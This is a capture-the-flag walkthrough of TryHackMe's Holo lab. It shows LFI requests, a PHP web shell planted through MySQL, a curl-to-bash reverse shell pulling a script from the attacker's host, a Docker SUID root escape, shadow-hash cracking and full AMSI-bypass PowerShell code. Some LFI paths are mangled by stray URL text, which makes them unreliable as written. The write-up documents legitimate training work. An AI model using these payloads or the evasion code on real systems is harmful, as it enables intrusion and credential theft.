- URL: https://tryhackme.com/room/hololive
- Target OS: Linux x 1 / Windows x 5
- Rated Difficulty: Hard
INTRODUCTION
Welcome to Holo!
Holo is an Active Directory and Web Application attack lab that teaches core web attack vectors and advanced\obscure Active Directory attacks along with general red teaming methodology and concepts.
In this lab, you will learn and explore the following topics:
- .NET basics
- Web application exploitation
- AV evasion
- Whitelist and container escapes
- Pivoting
- Operating with a C2 (Command and Control) Framework
- Post-Exploitation
- Situational Awareness
- Active Directory attacks
You will learn and exploit the following attacks and misconfigurations:
- Misconfigured sub-domains
- Local file Inclusion
- Remote code execution
- Docker containers
- SUID binaries
- Password resets
- Client-side filters
- AppLocker
- Vulnerable DLLs
- Net-NTLMv2 / SMB
Task 4 – Flag Submission – Flag Submission Panel
What flag can be found inside of the container?
What flag can be found after gaining user on L-SRV01?
What flag can be found on the Web Application on S-SRV01?
What flag can be found after rooting S-SRV01?
What flag can be found after gaining user on PC-FILESRV01?
What flag can be found after rooting PC-FILESRV01?
What flag can be found after rooting DC-SRV01?
Task 8 – Initial Recon – NOT EVERY GEEK WITH A COMMODORE 64 CAN HACK INTO NASA!
NMAP Initial
❯ nmap -sC -sV -v -p- -oN nmap_initial 10.200.110.0/24
Scanning 2 hosts [65535 ports/host]
Discovered open port 22/tcp on 10.200.110.250
Discovered open port 22/tcp on 10.200.110.33
Discovered open port 80/tcp on 10.200.110.33
❯ sudo nmap -sS -A -v -p- -oN nmap_33 10.200.110.33
# Nmap 7.92 scan initiated Fri Jan 21 19:35:19 2022 as: nmap -sS -A -v -p- -oN nmap_33 10.200.110.33
Nmap scan report for holo.live (10.200.110.33)
Host is up (0.31s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 09:ac:8c:c0:66:5d:3f:70:ff:41:3a:ee:ea:7f:0d:1d (RSA)
| 256 99:83:eb:d1:1a:22:b0:e5:0a:e1:c8:49:0f:6f:43:64 (ECDSA)
|_ 256 e3:0a:77:c1:51:74:e7:26:cc:d0:84:5a:15:55:a7:17 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Did not follow redirect to http://www.holo.live/
| http-robots.txt: 21 disallowed entries (15 shown)
| /var/www/wordpress/index.php
| /var/www/wordpress/readme.html /var/www/wordpress/wp-activate.php
| /var/www/wordpress/wp-blog-header.php /var/www/wordpress/wp-config.php
| /var/www/wordpress/wp-content /var/www/wordpress/wp-includes
| /var/www/wordpress/wp-load.php /var/www/wordpress/wp-mail.php
| /var/www/wordpress/wp-signup.php /var/www/wordpress/xmlrpc.php
| /var/www/wordpress/license.txt /var/www/wordpress/upgrade
|_/var/www/wordpress/wp-admin /var/www/wordpress/wp-comments-post.php
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.29 (Ubuntu)
33060/tcp open mysqlx?
| fingerprint-strings:
| DNSStatusRequestTCP, LDAPSearchReq, NotesRPC, SSLSessionReq, TLSSessionReq, X11Probe, afp:
| Invalid message"
|_ HY000
Uptime guess: 27.394 days (since Sat Dec 25 10:53:33 2021)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=256 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 111/tcp)
HOP RTT ADDRESS
1 311.86 ms 10.50.107.1
2 312.02 ms holo.live (10.200.110.33)
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Jan 21 20:20:50 2022 -- 1 IP address (1 host up) scanned in 2731.66 seconds
What is the last octet of the IP address of the public-facing web server?
How many ports are open on the web server?
What CME is running on port 80 of the web server?
What version of the CME is running on port 80 of the web server?
What is the HTTP title of the web server?
Task 9 – Web App Exploitation – Punk Rock 101 err Web App 101
Gobuster VHOST scan on holo.live
❯ gobuster vhost -u http://holo.live -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://holo.live
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2022/01/21 16:20:15 Starting gobuster in VHOST enumeration mode
===============================================================
Found: dev.holo.live (Status: 200) [Size: 7515]
Found: admin.holo.live (Status: 200) [Size: 1845]
Found: www.holo.live (Status: 200) [Size: 21405]
Found: gc._msdcs.holo.live (Status: 400) [Size: 422]
Found: _domainkey.holo.live (Status: 400) [Size: 422]
What domains loads images on the first web page?
What are the two other domains present on the web server? Format: Alphabetical Order
Task 10 – Web App Exploitation – What the Fuzz?
LOOT >> robots.txt on www holo.live
User-Agent: *
Disallow: /var/www/wordpress/index.php
Disallow: /var/www/wordpress/readme.html
Disallow: /var/www/wordpress/wp-activate.php
Disallow: /var/www/wordpress/wp-blog-header.php
Disallow: /var/www/wordpress/wp-config.php
Disallow: /var/www/wordpress/wp-content
Disallow: /var/www/wordpress/wp-includes
Disallow: /var/www/wordpress/wp-load.php
Disallow: /var/www/wordpress/wp-mail.php
Disallow: /var/www/wordpress/wp-signup.php
Disallow: /var/www/wordpress/xmlrpc.php
Disallow: /var/www/wordpress/license.txt
Disallow: /var/www/wordpress/upgrade
Disallow: /var/www/wordpress/wp-admin
Disallow: /var/www/wordpress/wp-comments-post.php
Disallow: /var/www/wordpress/wp-config-sample.php
Disallow: /var/www/wordpress/wp-cron.php
Disallow: /var/www/wordpress/wp-links-opml.php
Disallow: /var/www/wordpress/wp-login.php
Disallow: /var/www/wordpress/wp-settings.php
Disallow: /var/www/wordpress/wp-trackback.php
ENUM >> img.php found on dev.holo.live
❯ curl -v "http://dev.holo.live/img.php?filhttps://stimpz0r.com/wp-content/uploads/2022/02/../../etc/passwd"
* Trying 10.200.110.33:80...
* Connected to dev.holo.live (10.200.110.33) port 80 (#0)
> GET /img.php?filhttps://stimpz0r.com/wp-content/uploads/2022/02/../../etc/passwd HTTP/1.1
> Host: dev.holo.live
> User-Agent: curl/7.74.0
> Accept: */*
>
* Mark bundle as not supporting multiuse
< HTTP/1.1 200 OK
< Date: Fri, 21 Jan 2022 08:40:10 GMT
< Server: Apache/2.4.29 (Ubuntu)
< Content-Length: 982
<
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
mysql:x:101:101:MySQL Server,,,:/nonexistent:/bin/false
LOOT >> robots.txt on admin.holo.live
User-agent: *
Disallow: /var/www/admin/db.php
Disallow: /var/www/admin/dashboard.php
Disallow: /var/www/admin/supersecretdir/creds.txt
What file leaks the web server's current directory?
What file loads images for the development domain?
What is the full path of the credentials file on the administrator domain?
Task 12 – Web App Exploitation – What is this? Vulnversity?
LOOT >> LFI to read /var/www/admin/supersecretdir/creds.txt
❯ curl -v "http://dev.holo.live/img.php?filhttps://stimpz0r.com/wp-content/uploads/2022/02/../../var/www/admin/supersecretdir/creds.txt"
* Trying 10.200.110.33:80...
* Connected to dev.holo.live (10.200.110.33) port 80 (#0)
> GET /img.php?filhttps://stimpz0r.com/wp-content/uploads/2022/02/../../var/www/admin/supersecretdir/creds.txt HTTP/1.1
> Host: dev.holo.live
> User-Agent: curl/7.74.0
> Accept: */*
>
* Mark bundle as not supporting multiuse
< HTTP/1.1 200 OK
< Date: Fri, 21 Jan 2022 08:41:00 GMT
< Server: Apache/2.4.29 (Ubuntu)
< Content-Length: 93
<
I know you forget things, so I'm leaving this note for you:
<REDACTED>
- gurag <3
CREDS - /var/www/admin/supersecretdir/creds.txt
What file is vulnerable to LFI on the development domain?
What parameter in the file is vulnerable to LFI?
What file found from the information leak returns an HTTP error code 403 on the administrator domain?
Using LFI on the development domain read the above file. What are the credentials found from the file?
Task 13 – Web App Exploitation – Remote Control Empanadas
ENUM >> RCE found! – dashboard.php on admin.holo.live
What file is vulnerable to RCE on the administrator domain?
What parameter is vulnerable to RCE on the administrator domain?
What user is the web server running as?
Task 15 – Situational Awareness – Docker? I hardly even know her!
Task 16 – Situational Awareness – Living off the LANd
#!/usr/bin/python3
import socket
host = "192.168.100.1"
portList = [21,22,53,80,443,3306,8443,8080]
for port in portList:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
s.connect((host,port))
print("Port ", port, " is open")
except:
print("Port ", port, " is closed")
www-data@7f4902d04e25:/tmp$ ./ps.py
Port 21 is closed
Port 22 is open
Port 53 is closed
Port 80 is open
Port 443 is closed
Port 3306 is open
Port 8443 is closed
Port 8080 is open
What is the Default Gateway for the Docker Container?
What is the high web port open in the container gateway?
What is the low database port open in the container gateway?
Task 16 – Situational Awareness – Dorkus Storkus – Protector of the Database
LOOT >> db_connect.php found in /var/www/admin
<?php
define('DB_SRV', '192.168.100.1');
define('DB_PASSWD', "<REDACTED>");
define('DB_USER', '<REDACTED>');
define('DB_NAME', 'DashboardDB');
$connection = mysqli_connect(DB_SRV, DB_USER, DB_PASSWD, DB_NAME);
if($connection == false){
die("Error: Connection to Database could not be made." . mysqli_connect_error());
}
?>
CREDS - MySQL database
ENUM >> MySQL server on 192.168.100.1
www-data@739eb495c6aa:/var/www/admin$ mysql -u admin -p -h 192.168.100.1
Enter password:
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 11
Server version: 8.0.22-0ubuntu0.20.04.2 (Ubuntu)
Copyright (c) 2000, 2020, Oracle and/or its affiliates. All rights reserved.
Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
mysql> show databases;
+--------------------+
| Database |
+--------------------+
| DashboardDB |
| information_schema |
| mysql |
| performance_schema |
| sys |
+--------------------+
5 rows in set (0.00 sec)
mysql> use DashboardDB;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
mysql> show tables;
+-----------------------+
| Tables_in_DashboardDB |
+-----------------------+
| users |
+-----------------------+
1 row in set (0.01 sec)
mysql> show columns from users;
+----------+--------------+------+-----+---------+-------+
| Field | Type | Null | Key | Default | Extra |
+----------+--------------+------+-----+---------+-------+
| username | varchar(256) | YES | | NULL | |
| password | varchar(256) | YES | | NULL | |
+----------+--------------+------+-----+---------+-------+
2 rows in set (0.00 sec)
mysql> select * from users;
+----------+-----------------+
| username | password |
+----------+-----------------+
| <REDACTED> | <REDACTED> |
| gurag | AAAA |
+----------+-----------------+
2 rows in set (0.00 sec)
What is the server address of the remote database?
What is the password of the remote database?
What is the username of the remote database?
What is the database name of the remote database?
What username can be found within the database itself?
Task 18 – Situational Awareness – Making Thin Lizzy Proud
mysql> select '<?php $cmd=$_GET["cmd"];system($cmd);?>' INTO OUTFILE '/var/www/html/sh.php';
Query OK, 1 row affected (0.00 sec)
www-data@739eb495c6aa:/var/www/admin$ curl -v "http://192.168.100.1:8080/sh.php?cmd=whoami"
* Trying 192.168.100.1...
* TCP_NODELAY set
* Connected to 192.168.100.1 (192.168.100.1) port 8080 (#0)
> GET /sh.php?cmd=whoami HTTP/1.1
> Host: 192.168.100.1:8080
> User-Agent: curl/7.58.0
> Accept: */*
>
< HTTP/1.1 200 OK
< Date: Fri, 21 Jan 2022 11:29:29 GMT
< Server: Apache/2.4.41 (Ubuntu)
< Content-Length: 9
< Content-Type: text/html; charset=UTF-8
<
www-data
* Connection #0 to host 192.168.100.1 left intact
What user is the database running as?
Task 19 – Situational Awareness – Going%20out%20with%20a%20SHEBANG%21
PRIVESC >> Docker breakout to 192.168.100.1
www-data@739eb495c6aa:/var/www/admin$ curl -v "http://192.168.100.1:8080/sh.php?cmd=curl%20http%3A%2F%2F10.50.107.119%3A8080%2Frsh.sh%7Cbash%20%26"
* Trying 192.168.100.1...
* TCP_NODELAY set
* Connected to 192.168.100.1 (192.168.100.1) port 8080 (#0)
> GET /sh.php?cmd=curl%20http%3A%2F%2F10.50.107.119%3A8080%2Frsh.sh%7Cbash%20%26 HTTP/1.1
> Host: 192.168.100.1:8080
> User-Agent: curl/7.58.0
> Accept: */*
>
❯ nc -lnvp 1337
listening on [any] 1337 ...
connect to [10.50.107.119] from (UNKNOWN) [10.200.110.33] 39190
bash: cannot set terminal process group (2226): Inappropriate ioctl for device
bash: no job control in this shell
www-data@ip-10-200-110-33:/var/www/html$ cd ..
www-data@ip-10-200-110-33:/var/www$ cat user.txt
<REDACTED>
FLAG - LSRV-01 user.txt
Task 20 – Privilege Escalation – Call me Mario, because I got all the bits
PRIVESC >> docker has SUID…
www-data@ip-10-200-110-33:/tmp$ /usr/bin/docker run -v /:/mnt --rm -it ubuntu:18.04 chroot /mnt sh
# whoami
root
# cd /root
# cat root.txt
<REDACTED>
FLAG - L-SRV01 root.txt
What is the full path of the binary with an SUID bit set on L-SRV01?
What is the full first line of the exploit for the SUID bit?
Task 21 – Privilege Escalation – From the Shadows
LOOT >> /etc/shadow
root:$6$TvYo6Q8EXPuYD8w0$Yc.Ufe3ffMwRJLNroJuMvf5/Telga69RdVEvgWBC.FN5rs9vO0NeoKex4jIaxCyWNPTDtYfxWn.EM4OLxjndR1:18605:0:99999:7:::
daemon:*:18512:0:99999:7:::
bin:*:18512:0:99999:7:::
sys:*:18512:0:99999:7:::
sync:*:18512:0:99999:7:::
games:*:18512:0:99999:7:::
man:*:18512:0:99999:7:::
lp:*:18512:0:99999:7:::
mail:*:18512:0:99999:7:::
news:*:18512:0:99999:7:::
uucp:*:18512:0:99999:7:::
proxy:*:18512:0:99999:7:::
www-data:*:18512:0:99999:7:::
backup:*:18512:0:99999:7:::
list:*:18512:0:99999:7:::
irc:*:18512:0:99999:7:::
gnats:*:18512:0:99999:7:::
nobody:*:18512:0:99999:7:::
systemd-network:*:18512:0:99999:7:::
systemd-resolve:*:18512:0:99999:7:::
systemd-timesync:*:18512:0:99999:7:::
messagebus:*:18512:0:99999:7:::
syslog:*:18512:0:99999:7:::
_apt:*:18512:0:99999:7:::
tss:*:18512:0:99999:7:::
uuidd:*:18512:0:99999:7:::
tcpdump:*:18512:0:99999:7:::
sshd:*:18512:0:99999:7:::
landscape:*:18512:0:99999:7:::
pollinate:*:18512:0:99999:7:::
ec2-instance-connect:!:18512:0:99999:7:::
systemd-coredump:!!:18566::::::
ubuntu:!$6$6/mlN/Q.1gopcuhc$7ymOCjV3RETFUl6GaNbau9MdEGS6NgeXLM.CDcuS5gNj2oIQLpRLzxFuAwG0dGcLk1NX70EVzUUKyUQOezaf0.:18601:0:99999:7:::
lxd:!:18566::::::
mysql:!:18566:0:99999:7:::
dnsmasq:*:18566:0:99999:7:::
linux-admin:<REDACTED>:18570:0:99999:7:::
CREDS - linux-admin shadow hash
What non-default user can we find in the shadow file on L-SRV01?
Task 22 – Privilege Escalation – Crack all the Things
Session..........: hashcat
Status...........: Running
Hash.Mode........: 1800 (sha512crypt $6$, SHA512 (Unix))
Hash.Target......: /root/.hashcat/hashes/shadow.hash
Time.Started.....: Sat Jan 22 01:40:10 2022 (4 mins, 45 secs)
Time.Estimated...: Sat Jan 22 01:54:33 2022 (9 mins, 38 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/content/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 33279 H/s (413.58ms) @ Accel:1024 Loops:512 Thr:128 Vec:1
Recovered........: 0/2 (0.00%) Digests, 0/2 (0.00%) Salts
Progress.........: 9437184/28688768 (32.90%)
Rejected.........: 0/9437184 (0.00%)
Restore.Point....: 4718592/14344384 (32.90%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:2048-2560
Candidate.Engine.: Device Generator
Candidates.#1....: pequeñasabandija -> p3KeSn
Hardware.Mon.#1..: Temp: 77c Util:100% Core:1125MHz Mem:5000MHz Bus:16
<REDACTED>:<REDACTED>
CREDS - linux-admin
What is the plaintext cracked password from the shadow hash?
Task 23 – Pivoting – Digging a tunnel to nowhere
- This subject is well covered in TryHackMe >> Wreath (Tasks 8-16) so I will not re-focus on it here.
Task 24 – Command and Control – Command your Foes and Control your Friends
The C2 we will be using in this room will be Covenant
- Covenant Wiki – https://github.com/cobbr/Covenant/wiki
Covenant Installation
- Requires dotnet3.1 –
sudo apt install dotnet-sdk-3.1
- Dotnet install instructions – https://docs.microsoft.com/en-us/dotnet/core/install/linux-ubuntu
- Git clone – `git clone –recurse-submodules https://github.com/cobbr/Covenant‘
- To run –
sudo ./dotnet run --project /opt/Covenant/Covenant
- Covenant frontend – http://127.0.0.1:7443
Task 24 – Command and Control – Bug on the Wire
Covenant Listeners
The first step in operating with Covenant is to create a listener. Listeners are built off profiles; you can think of profiles like HTTP requests/pages that will serve as the channel that will handle all C2 traffic. There are four default profiles that Covenant comes with, outlined below.
CustomHttpProfile
– Custom profile that does not require any cookies.DefaultBridgeProfile
– Default profile for a C2 bridge.DefaultHttpProfile
– Default HTTP profile.TCPBridgeProfile
– Default TCP profile for a C2 bridge.
Covenant offers an easy way of editing the listeners along with a GUI. There are many parameters present; we will only be going over a quick overview of each parameter outlined below.
Name
– Name of profile to be used throughout the interface.Description
– Description of profile and its use cases.MessageTransform
– Specify how data will be transformed before being placed in other parameters.HttpUrls
– list of URLs the grunt can callback to.HttpRequestHeaders
– List of header pairs (name/value) that will be sent with every HTTP request.HttpResponseHeaders
– List of header pairs (name/value) that will be sent with every HTTP response.HttpPostRequest
– Format of data when a grunt posts data back to the profile.HttpGetResponse
– HTTP response when a grunt GETs data to the listener.HttpPostResponse
– HTTP response when a grunt POSTs data to the listener.
To create a listener, navigate to the Listeners tab from the side menu and select Create Listener.
You will see several options to edit; each option is outlined below.
Name
– (optional) will help to identify different listeners.BindAddress
– Local address listener will bind on, usually0.0.0.0
.BindPort
– Local port listener will bind on.ConnectPort
– Port to callback to, suggested to set to80
,8080
, or8888
.ConnectAddresses
– Addresses for the listener to callback to, hostname portion of theURL
.URLs
– Callback URLs the grunt will be connected directly back to.UseSSL
– Determines whether or not the listener usesHTTP
orHTTPS
.SSLCertificate
– Certificate used by the listener if SSL is set to true.SSLCertificatePassword
– Password being used by theSSLCertificate
.HttpProfile
– Profile used by the listener and grunt to determine communication behavior.
To create a basic listener for this network we only suggest editing the Name
, ConnectPort
, and ConnectAddresses
Task 25 – Command and Control – The Blood Oath
Covenant Launchers
From the Covenant GitHub, "Launchers are used to generate, host, and download binaries, scripts, and one-liners to launch new Grunts."
There are ten different launchers to choose from within Covenant, each launcher will have its requirements, and some may not be supported on modern operating systems. Launcher types are outlined below.
Binary
– Generates a custom binary to launch grunt, does not rely on a system binary.Shellcode
– Converts binary to shellcode using donut, https://github.com/TheWover/donutPowerShell
– Generates PowerShell code to launch a grunt usingpowershell.exe
.MSBuild
– Generates an MSBuild XML file to launch a grunt usingmsbuild.exe
, https://lolbas-project.github.io/lolbas/Binaries/Msbuild/InstallUtil
– Generates an InstallUtil XML file to launch a grunt usinginstallutil.exe
, https://lolbas-project.github.io/lolbas/Binaries/Installutil/Mshta
– Generates an HTA file to launch a grunt usingmshta.exe
, https://lolbas-project.github.io/lolbas/Binaries/Mshta/Regsrv32
– Generates an SCT file to launch a grunt usingregsrv32.exe
, https://lolbas-project.github.io/lolbas/Binaries/Regsvr32/Wmic
– Generates an XSL file to launch a grunt usingwmic.exe
, https://lolbas-project.github.io/lolbas/Binaries/Wmic/Cscript
– Generate a JScript file to launch a grunt usingcscript.exe
, https://lolbas-project.github.io/lolbas/Binaries/Cscript/Wscript
– Generate a JScript file to launch a grunt usingwscript.exe
, https://lolbas-project.github.io/lolbas/Binaries/Wscript/
There are several options for each launcher, with some launchers having specific options. For this task, we will be focusing on the binary launcher and its options. The configuration options are outlined below.
Listener
– Listener the grunt will communicate with.ImplantTemplate
– Type of implant launcher will use.DotNetVersion
– .NET version launcher will use, dependent onImplantTemplate
.Delay
– Time grunt will sleep in-between callbacks. A larger delay can aid in stealthy communications.JitterPercent
– Percent of variability inDelay
.ConnectAttempts
– Amount of times grunt will attempt to connect back to the server before quitting.KillDate
– Date specified grunt will quit and stop calling back.
To create a basic launcher for this network, we only suggest editing the Listener
and ImplantTemplate
Task 25 – Command and Control – We ran out of Halo and YAML references…
Covenant Tasks
This task attempts to show how to build a basic task and then seems to be missing most the instructions on how to include SharpEDRChecker
. Because of this, I have written the basic steps below, and rather than create a Task YAML file manually, we will use Covenant to create it via the frontend.
- Git clone
SharpEDRChecker
into/opt/Covenant/Covenant/Data/ReferenceSourceLibraries
–cd /opt/Covenant/Covenant/Data/ReferenceSourceLibraries && sudo git clone https://github.com/PwnDexter/SharpEDRChecker
- Go to Tasks -> Reference Source Libraries and press + Create
- Enter in the data as in the screenshot below:
NOTE: you may have issues when selecting the
ReferenceAssemblies
– even if I selected all 8, when I click the Edit button to update it would not save them all, just keep selecting them and hitting Edit to save until all 8 are selected.
- The
ReferenceAssemblies
you need are (ticked only, not necessarily in the order below):
Task 28 – Web App Exploitation – Hide yo’ Kids, Hide yo’ Wives, Hide yo’ Tokens
- On
http://10.200.110.31
click theReset password
button
- Enter
gurag
as the username and press theReset
button
- (Using Firefox) – go to Developer Tools -> Networking and click on the line starting with
password_reset.php
– click on theCookies
tab and under theResponse Cookies
section you will find the token nameduser_token
– copy the contents ofuser_token
to your clipboard
- Paste the
user_token
contents at the end of the address bar afteruser_token=
and hitEnter
- On the next screen, ensure that the username states
gurag
and hit theUpdate
button… you do not need to set a password
- Success! We get a flag, and now we have a useable login for
gurag
FLAG - S-SRV01 web app
NOTE: to get the size of the cookie, in Developer Tools (FireFox) go to Storage -> Cookies -> (S-SRV01 URL) and look at the
size
column
What user can we control for a password reset on S-SRV01?
What is the name of the cookie intercepted on S-SRV01?
What is the size of the cookie intercepted on S-SRV01?
What page does the reset redirect you to when successfully authenticated on S-SRV01?
Task 30 – AV Evasion – Basically a joke itself…
TryHackMe >> Wreath had a decent explanation of AV Evasion… but zero methods, where as this room covers it in practical ways… because of this, the next few sections will be covered in more detail, but for an explanation of AV Evasion go visit TryHackMe >> Wreath, or even read explanations in the room itself.
Although most the information in the AV Evasion tasks will be simply copy-paste from the room itself, I will keep it to the basics.
Anti-Malware Scan Interface (AMSI)
The Anti-Malware Scan Interface (AMSI) is a PowerShell security feature that will allow any applications or services to integrate into antimalware products. AMSI will scan payloads and scripts before execution inside of the runtime. From Microsoft, "The Windows Antimalware Scan Interface (AMSI) is a versatile interface standard that allows your applications and services to integrate with any antimalware product that’s present on a machine. AMSI provides enhanced malware protection for your end-users and their data, applications, and workloads."
For more information about AMSI, check out the Windows docs, https://docs.microsoft.com/en-us/windows/win32/amsi/
Find an example of how data flows inside of Windows security features below.
AMSI will send different response codes based on the results of its scans. Find a list of response codes from AMSI below:
AMSI_RESULT_CLEAN = 0
AMSI_RESULT_NOT_DETECTED = 1
AMSI_RESULT_BLOCKED_BY_ADMIN_START = 16384
AMSI_RESULT_BLOCKED_BY_ADMIN_END = 20479
AMSI_RESULT_DETECTED = 32768
AMSI is fully integrated into the following Windows components:
- User Account Control, or UAC
- PowerShell
- Windows Script Host (wscript and cscript)
- JavaScript and VBScript
- Office VBA macros
AMSI is instrumented in both System.Management.Automation.dll
and within the CLR itself. When inside the CLR, it is assumed that Defender is already being instrumented; this means AMSI will only be called when loaded from memory.
Task 31 – AV Evasion – THEY WONT SEE ME IF I YELL!
Bypassing AMSI
There are a large number of bypasses for AMSI available, a majority written in PowerShell and C#. Find a list of common bypasses below.
- Patching
amsi.dll
- Amsi
ScanBuffer
patch - Forcing errors
- Matt Graeber’s Reflection, https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/
- PowerShell downgrade
For more information about the variety of bypasses available, check out this GitHub repo, https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell
The method we will be looking at is patching amsi.dll
written in PowerShell. This bypass is modified by BC-Security inspired by Tal Liberman, https://github.com/BC-SECURITY/Empire/blob/master/lib/common/bypasses.py. RastaMouse also has a similar bypass written in C# that uses the same technique, https://github.com/rasta-mouse/AmsiScanBufferBypass/blob/main/AmsiBypass.cs .The bypass will identify DLL locations and modify memory permissions to return undetected AMSI response values.
AMSI bypass – amsi.dll patching
$MethodDefinition = "
[DllImport("kernel32")]
public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
[DllImport("kernel32")]
public static extern IntPtr GetModuleHandle(string lpModuleName);
[DllImport("kernel32")]
public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect);
";
$Kernel32 = Add-Type -MemberDefinition $MethodDefinition -Name 'Kernel32' -NameSpace 'Win32' -PassThru;
$ABSD = 'AmsiS'+'canBuffer';
$handle = [Win32.Kernel32]::GetModuleHandle('amsi.dll');
[IntPtr]$BufferAddress = [Win32.Kernel32]::GetProcAddress($handle, $ABSD);
[UInt32]$Size = 0x5;
[UInt32]$ProtectFlag = 0x40;
[UInt32]$OldProtectFlag = 0;
[Win32.Kernel32]::VirtualProtect($BufferAddress, $Size, $ProtectFlag, [Ref]$OldProtectFlag);
$buf = [Byte[]]([UInt32]0xB8,[UInt32]0x57, [UInt32]0x00, [Uint32]0x07, [Uint32]0x80, [Uint32]0xC3);
[system.runtime.interopservices.marshal]::copy($buf, 0, $BufferAddress, 6);
Code breakdown
- The first section of code lines 3 – 10 will use C# to call-in functions from
Kernel32
to identify where amsi.dll has been loaded.
[DllImport("kernel32")]
public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
[DllImport("kernel32")]
public static extern IntPtr GetModuleHandle(string lpModuleName);
[DllImport("kernel32")]
public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect);
- Once the C# functions are called in, the code will use Add-type to load the C# and identify the
AmsiScanBuffer
string in lines 13 – 16. This string can be used to determine whereamsi.dll
has been loaded and the address location usingGetProcAddress
.
$Kernel32 = Add-Type -MemberDefinition $MethodDefinition -Name 'Kernel32' -NameSpace 'Win32' -PassThru;
$ABSD = 'AmsiS'+'canBuffer';
$handle = [Win32.Kernel32]::GetModuleHandle('amsi.dll');
[IntPtr]$BufferAddress = [Win32.Kernel32]::GetProcAddress($handle, $ABSD);
- The next section of code lines 17 – 23 will modify memory permissions and patch
amsi.dll
to return a specified value.
[UInt32]$Size = 0x5;
[UInt32]$Size = 0x5;
[UInt32]$OldProtectFlag = 0;
[Win32.Kernel32]::VirtualProtect($BufferAddress, $Size, $ProtectFlag, [Ref]$OldProtectFlag);
$buf = [Byte[]]([UInt32]0xB8,[UInt32]0x57, [UInt32]0x00, [Uint32]0x07, [Uint32]0x80, [Uint32]0xC3); [system.runtime.interopservices.marshal]::copy($buf, 0, $BufferAddress, 6);
Further reading
For more information about AMSI bypasses, check out the following resources.
- https://offensivedefence.co.uk/posts/making-amsi-jump/
- https://i.blackhat.com/briefings/asia/2018/asia-18-Tal-Liberman-Documenting-the-Undocumented-The-Rise-and-Fall-of-AMSI.pdf
- https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell
- https://github.com/byt3bl33d3r/OffensiveNim/blob/master/src/amsi_patch_bin.nim
- https://blog.f-secure.com/hunting-for-amsi-bypasses/
- https://www.contextis.com/us/blog/amsi-bypass
- https://www.redteam.cafe/red-team/powershell/using-reflection-for-amsi-bypass
- https://amsi.fail/
- https://rastamouse.me/blog/asb-bypass-pt2/
- https://0x00-0x00.github.io/research/20https://stimpz0r.com/wp-content/uploads/2022/02/How-to-bypass-AMSI-and-Execute-ANY-malicious-powershell-code.html
- https://www.youtube.com/watch?v=F_BvtXzH4a4
- https://www.youtube.com/watch?v=lP2KF7_Kwxk
- https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/
Task 32 – AV Evasion – AMSIception
Obfuscating AMSI bypass code
Generally, AMSI is only looking for weak strings for AMSI bypasses such as AmsiScanBuffer
, amsiInitFailed
, AmsiUtils
, etc. This is where string concatenation can come into play and aid in breaking these string signatures. As EDR solutions and products progress, these signatures and methods may become more robust. Still, these identical signatures have been prevalent for a reasonable amount of time and aren’t expected to be changing any time soon for non-commercial products.
To aid in our obfuscation efforts, we will use the AMSITrigger script – https://github.com/RythmStick/AMSITrigger, written by RythmStick. This script will take a given PowerShell script and each unique string within it against AMSI to identify what strings are being used to flag the script as malicious. This will only test against AMSI and not Defender; we will go over obfuscating for Defender in a later task; however, for this task, we only need to worry about AMSI since everything is file-less (mostly).
